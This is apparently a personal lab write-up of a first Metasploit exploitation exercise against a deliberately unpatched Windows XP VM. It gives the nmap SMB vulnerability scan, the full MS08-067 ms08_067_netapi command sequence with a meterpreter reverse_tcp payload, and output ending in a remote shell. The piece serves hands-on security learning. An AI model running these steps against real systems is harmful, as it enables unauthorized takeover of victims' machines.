I shall attempt my first exploit and target the Windows portion of my Virtual Hacking Lab. I’m following instructions given in Chapter 5 (The Joy of Exploitation) of Metasploit: The Penetration Tester’s Guide.
The exploitee system comprises: Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
First up is to scan the ports with Nmap from within Metasploit:
nmap -sT -A –script=smb-check-vulns –script-args=unsafe=1 -P0 192.168.1.79
I have run an Nmap scan against this before using different switches; however, this time, included in the results is:
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive
Obviously the ‘MS08-067: VULNERABLE’ is the pertinent result and so on to the exploit:
I searched Metasploit for the vulnerability:
msf > search MS08-067
Matching Modules
================Name Disclosure Date Rank Description
—- ————— —- ———–
Name: exploit/windows/smb/ms08_067_netapi
Disclosure Date: 2008-10-28
Rank:great
Description: Microsoft Server Service Relative Path Stack Corruption
So, to the attack:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp (This has the target machine connect to the attacking machine)
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
– —-
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (AlwaysOn NX)….SNIP….
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3 (I know from Nmap scan the Operating System details)
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79 (Target machine)
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70 (Attacking Machine)
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080 (Attacking machine’s listening port)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.70:8080
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
msf exploit(ms08_067_netapi) > exploit[*] Started reverse handler on 192.168.1.70:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit[*] Started reverse handler on 192.168.1.70:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit[*] Started reverse handler on 192.168.1.70:8080
[*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:8080 -> 192.168.1.79:1036) at 2013-06-02 10:06:42 +0100
meterpreter > shell
Process 2236 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
And there it is, in all its glory, an interactive command shell. I now have complete control over the target machine.
Obviously the Virtual Hacking Lab target is deliberately configured vulnerable and the operating system is old and unpatched with no firewall; still, really enjoyed testing out Metasploit for the first time and getting the desired result.